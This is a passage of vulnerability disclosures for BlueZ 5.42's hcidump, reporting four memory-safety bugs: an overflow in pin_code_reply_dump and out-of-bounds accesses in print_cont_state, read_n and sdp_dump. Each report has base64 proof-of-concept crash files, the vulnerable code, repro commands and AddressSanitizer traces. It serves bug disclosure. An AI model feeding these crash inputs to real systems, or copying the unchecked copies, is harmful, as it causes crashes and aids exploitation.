00 01 f9 =>0x0000800afaf0:[f9]f9 f9 f9 00 07 f9 f9 f9 f9 f9 f9 00 00 01 f9 0x0000800afb00: f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9 00 00 01 f9 0x0000800afb10: f9 f9 f9 f9 00 06 f9 f9 f9 f9 f9 f9 00 00 00 01 0x0000800afb20: f9 f9 f9 f9 00 07 f9 f9 f9 f9 f9 f9 00 00 00 00 0x0000800afb30: 04 f9 f9 f9 f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9 0x0000800afb40: 00 00 00 06 f9 f9 f9 f9 00 00 03 f9 f9 f9 f9 f9 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc ASan internal: fe ==30076==ABORTING
Machine: x86_64 OS: linux-gnu Compiler: gcc Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address Machine Type: x86_64-unknown-linux-gnu BlueZ Version: 5.42 Release Status: release Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz Description: An buffer overflow was observed in "pin_code_reply_dump" function in "tools/parser/hci.c" source file. The issue exist because "pin" array is overflowed by supplied parameter due to lack of boundary checks on size of the buffer from frame "pin_code_reply_cp *cp" parameter. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command: ./tools/hcidump -a -r <PoC File> PoC.file base64 encoded: IABAl5CgBAQEBAQoBA0EAJCQkEMC0dHOleIAAABkAAEGhwIX/39vllIgSmQBAAAAgD5sGv9mAAAB AQASRD4+WCE7AAAABAEAED4+PlgAAR8ADuYBAD4IBBo+/T660AMEAQAwPj4+WAABHwAD5gEAPgAE Fj4BAP//AwQBAAVRPj1YBj666AMEAQASPj4+WBo+utgDBAEA/5wAAAPmAQAAAwQBABIkAAABAD66 2AMEAQD/fwAAGBo+AAAAAQEAEiQ+PlgAAbrYAwQBAH8+PlA8Gjq6AAMEAQAwJj4+WAABHwAD5gEA PgAEGjgaEAAESgABAAD5gD5sGv9mBgDmAQA+CAQaPho+utADBAEAMD4+PlgAAR8AA+YBADA+Pj5Y AAEfAAPmAQA+lxYaPho+utgDBAEAMD5HPloAAR8AA+YBAD4ABBo+Gj662BIEAQCMPj5NWBo+ugAD BAEAAJCPjwBAj5TTgAABABI+TT5YGv+AAPYEAQASPj4BAAAAugADBAEAED4+PlgAAR8ADuYBAD4I BBo+Gj662AMEAQAwPj4+WAABHwAD5gEAPgAEFj5APv//AwQBAAU+Pj1YBj7c6AMEAQASPj4+WBo+ utgDBAEA/5wAABgaZLoAAwQBABIkPj5YGj662AMEAQD/fwAAGBo+AAAAAQEAMyQ+PlgAAbrYA4QB ABI+Pj08Gjq6AAMEAQAwPj4+WPsAHwADAAEAPgAEGjgaPrr4AwQBAGQA//9/cn9EBEoAAQASPj4+ WBo+utgDBAEAEj4+PTw6ProAAwQBADA+Pj5YAD662AMEAQASPj49PDo+ugADBAEAMD4+PlgAAR8A A+YBAD6XFho+Gj662AMEAQAwPkc+WgABHwAD5gEAPgAEGj4aPrrYEgQBAIw+Pk1YGj66AAMEAQAA kI+PAECPlNOAAAEAEj5NPlga/4AA9gQBABI+PgEAAAC6AAMEAQAQPj4+WAABHwAO5gEAPggEGj4a PrrYAwQBADA+Pj5YAAEfAAPmAQA+AAQWPkA+//8DBAEABT4+PVgGPrroAwQBABI+Pj5YGj662AME AQD/nAAAGBo+ugADBAEAEiQ+PlgaPrrYAwQBAP9/AAAYGj4AAAABABI+Pj49PDo+ugADBAEA Affected code: 981 static inline void pin_code_reply_dump(int level, struct frame *frm) 982 { 983 pin_code_reply_cp *cp = frm->ptr; 984 char addr[18], pin[17]; 985 986 p_indent(level, frm); 987 p_ba2str(&cp->bdaddr, addr); 988 memset(pin, 0, sizeof(pin)); 989 if (parser.flags & DUMP_NOVENDOR) 990 memset(pin, '*', cp->pin_len); 991 else 992 memcpy(pin, cp->pin_code, cp->pin_len); 993 printf("bdaddr %s len %d pin \'%s\'\n", addr, cp->pin_len, pin); 994 } Repeat-By: echo <above base64> > PoC.64 base64 -d PoC.b64 > PoC.file valgrind ./tools/hcidump -a -r PoC.file ASAN Report (bluez needs to compiled with -fsanitize=address for this): ==24887==ERROR: AddressSanitizer: unknown-crash on address 0x7aea85364520 at pc 0x4787ca bp 0x7aea85364450 sp 0x7aea85364448 WRITE of size 209 at 0x7aea85364520 thread T0 #0 0x4787c9 in pin_code_reply_dump tools/parser/hci.c:992 #1 0x4787c9 in command_dump tools/parser/hci.c:1752 #2 0x479623 in hci_dump tools/parser/hci.c:4112 #3 0x4035d4 in parse tools/parser/parser.h:260 #4 0x4035d4 in read_dump tools/hcidump.c:425 #5 0x4035d4 in main tools/hcidump.c:810 #6 0x6f5f04015b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44) #7 0x40529e (/opt/bluez/tools/hcidump+0x40529e) Address 0x7aea85364520 is located in stack of thread T0 at offset 160 in frame #0 0x46b3cf in command_dump tools/parser/hci.c:1685 This frame has 6 object(s): [32, 38) 'b' [96, 104) 't' [160, 177) 'pin' <== Memory access at offset 160 partially overflows this variable [224, 242) 'addr' <== Memory access at offset 160 partially underflows this variable [288, 344) 'tm' <== Memory access at offset 160 partially underflows this variable [384, 633) 'name' HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: unknown-crash tools/parser/hci.c:992 pin_code_reply_dump Shadow bytes around the buggy address: 0x0f5dd0a64850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0f5dd0a64860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0f5dd0a64870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0f5dd0a64880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0f5dd0a64890: f1 f1 f1 f1 06 f4 f4 f4 f2 f2 f2 f2 00 f4 f4 f4 =>0x0f5dd0a648a0: f2 f2 f2 f2[00]00 01 f4 f2 f2 f2 f2 00 00 02 f4 0x0f5dd0a648b0: f2 f2 f2 f2 00 00 00 00 00 00 00 f4 f2 f2 f2 f2 0x0f5dd0a648c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0f5dd0a648d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 0x0f5dd0a648e0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 0x0f5dd0a648f0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc ASan internal: fe ==24887==ABORTING
Machine: x86_64 OS: linux-gnu Compiler: gcc Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address Machine Type: x86_64-unknown-linux-gnu BlueZ Version: 5.42 Release Status: release Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz Description: An out-of-bound read was observed in "print_cont_state" function in "tools/parser/sdp.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command: ./tools/hcidump -a -r <PoC File> PoC.file base64 encoded: IAAABP8EDP///n//AgICFwIXAAEAAj4AAAEAAAC1tY8ABP//////jikAmM0gAPf/GRAAf40VAIoC AgITAjIAAAAFPgAAAQABAAACAAD/AOsaAP+OKZKYzSAACQAaqQCQjQAAnwICQhMCFwAAAAU+AAAB AQAAq7WPAAT///b//44pAJjNIAAEAQASPj4+WBo+utgDBAEA/5wAABgaProAAwC1tXQABP////// jikAmM0gAPf/GRAAf40VAIoCAgITAjIAAAAFPgAAAQABAIAAAAD/AOsaAP+OKZKYzSAA9/8ZqQCQ jQAAnwICQhMCFwAAAAU+AAABAQAAq7WPAAT///b//44pAJjNIAAEAT6jAAM+PlgaPj49PBo+ugAb BAEAMD4+WBo+utgDBAEAEj4+PTwaProAAwQBADA+Pj5YAAEf Affected code: 568 static inline void print_cont_state(int level, unsigned char *buf) 569 { 570 uint8_t cont = buf[0]; 571 int i; 572 573 p_indent(level, 0); 574 printf("cont"); 575 for (i = 0; i < cont + 1; i++) 576 printf(" %2.2X", buf[i]); 577 printf("\n"); 578 } Repeat-By: echo <above base64> > PoC.64 base64 -d PoC.b64 > PoC.file valgrind ./tools/hcidump -a -r PoC.file ASAN Report (bluez needs to compiled with -fsanitize=address for this): ==6337==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000ef96 at pc 0x4e39ec bp 0x7f3553ec2550 sp 0x7f3553ec2548 READ of size 1 at 0x60600000ef96 thread T0 #0 0x4e39eb in print_cont_state tools/parser/sdp.c:576 #1 0x4e39eb in sdp_dump tools/parser/sdp.c:764 #2 0x49a9c2 in l2cap_parse tools/parser/l2cap.c:1464 #3 0x4a627f in l2cap_dump tools/parser/l2cap.c:1624 #4 0x479c9c in acl_dump tools/parser/hci.c:4041 #5 0x479c9c in hci_dump tools/parser/hci.c:4120 #6 0x4035d4 in parse tools/parser/parser.h:260 #7 0x4035d4 in read_dump tools/hcidump.c:425 #8 0x4035d4 in main tools/hcidump.c:810 #9 0x7da2df158b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44) #10 0x40529e (/opt/bluez/tools/hcidump+0x40529e) 0x60600000ef96 is located 0 bytes to the right of 54-byte region [0x60600000ef60,0x60600000ef96) allocated by thread T0 here: #0 0x7da2df53673f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f) #1 0x4a50e7 in l2cap_dump tools/parser/l2cap.c:1581 #2 0x1f SUMMARY: AddressSanitizer: heap-buffer-overflow tools/parser/sdp.c:576 print_cont_state Shadow bytes around the buggy address: 0x0c0c7fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00 =>0x0c0c7fff9df0: 00 00[06]fa fa fa fa fa fd fd fd fd fd fd fd fa 0x0c0c7fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc ASan internal: fe ==6337==ABORTING
Machine: x86_64 OS: linux-gnu Compiler: gcc Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address Machine Type: x86_64-unknown-linux-gnu BlueZ Version: 5.42 Release Status: release Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz Description: An buffer overflow was observed in "read_n" function in "tools/hcidump.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command: ./tools/hcidump -a -r <PoC File> PoC.file base64 encoded: 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 j48= Affected code: 104 static inline int read_n(int fd, char *buf, int len) 105 { 106 int t = 0, w; 107 108 while (len > 0) { 109 if ((w = read(fd, buf, len)) < 0) { 110 if (errno == EINTR || errno == EAGAIN) 111 continue; 112 return -1; 113 } 114 if (!w) 115 return 0; 116 len -= w; buf += w; t += w; 117 } 118 return t; 119 } Repeat-By: echo <above base64> > PoC.64 base64 -d PoC.b64 > PoC.file valgrind ./tools/hcidump -a -r PoC.file ASAN Report (bluez needs to compiled with -fsanitize=address for this): ==19127==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001f75c at pc 0x7034529f99b6 bp 0x7289d18014f0 sp 0x7289d18014d8 WRITE of size 3712 at 0x61b00001f75c thread T0 #0 0x7034529f99b5 in read (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x299b5) #1 0x403a3b in read_n tools/hcidump.c:109 #2 0x403a3b in read_dump tools/hcidump.c:397 #3 0x403a3b in main tools/hcidump.c:810 #4 0x703452646b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44) #5 0x40529e (/opt/bluez/tools/hcidump+0x40529e) 0x61b00001f75c is located 0 bytes to the right of 1500-byte region [0x61b00001f180,0x61b00001f75c) allocated by thread T0 here: #0 0x703452a2473f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f) #1 0x402f12 in read_dump tools/hcidump.c:288 #2 0x402f12 in main tools/hcidump.c:810 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 read Shadow bytes around the buggy address: 0x0c367fffbe90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffbea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffbeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffbec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffbed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c367fffbee0: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c367fffbef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbf00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc ASan internal: fe ==19127==ABORTING
Machine: x86_64 OS: linux-gnu Compiler: gcc Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address Machine Type: x86_64-unknown-linux-gnu BlueZ Version: 5.42 Release Status: release Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz Description: An out-of-bound read was observed in "sdp_dump" function in "tools/parser/sdp.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command: ./tools/hcidump -a -r <PoC File> PoC.file base64 encoded: IAAABP8EDP///3//AgICFwIXAAEAAj4AAAEAAAC1tY8ABADrGgD/jikAmM0gAPf/GRAAkI0VAJ8C AgITAhcAAAAFPgAAAQz///9//wICAhcCFwABAAI+AAAAtbX/GRAAkI0VAJ8CAgAAAPgCAgICQAAA Affected code: 749 case SDP_SERVICE_ATTR_RSP: 750 /* Parse AttributeByteCount */ 751 count = p_get_u16(frm); 752 p_indent(level + 1, frm); 753 printf("count %d\n", count); 754 755 /* Parse ContinuationState */ 756 cont = *(unsigned char *)(frm->ptr + count); 757 758 if (cont == 0) { 759 /* Parse AttributeList */ 760 print_attr_list(level + 1, frame_get(frm, count)); 761 } else 762 frame_add(frm, count); 763 764 print_cont_state(level + 1, frm->ptr + count); 765 break; 766 Repeat-By: echo <above base64> > PoC.64 base64 -d PoC.b64 > PoC.file valgrind ./tools/hcidump -a -r PoC.file ASAN Report (bluez needs to compiled with -fsanitize=address for this): ==17871==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001fe8f at pc 0x4e30b5 bp 0x7ce9e036fa90 sp 0x7ce9e036fa88 READ of size 1 at 0x61b00001fe8f thread T0 #0 0x4e30b4 in sdp_dump tools/parser/sdp.c:756 #1 0x49a9c2 in l2cap_parse tools/parser/l2cap.c:1464 #2 0x479c9c in acl_dump tools/parser/hci.c:4041 #3 0x479c9c in hci_dump tools/parser/hci.c:4120 #4 0x4035d4 in parse tools/parser/parser.h:260 #5 0x4035d4 in read_dump tools/hcidump.c:425 #6 0x4035d4 in main tools/hcidump.c:810 #7 0x6c387c278b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44) #8 0x40529e (/opt/bluez/tools/hcidump+0x40529e) AddressSanitizer can not describe address in more detail (wild memory access suspected). SUMMARY: AddressSanitizer: heap-buffer-overflow tools/parser/sdp.c:756 sdp_dump Shadow bytes around the buggy address: 0x0c367fffbf80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbf90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbfa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbfb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbfc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c367fffbfd0: fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbfe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffc000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffc010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffc020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc ASan internal: fe ==17871==ABORTING
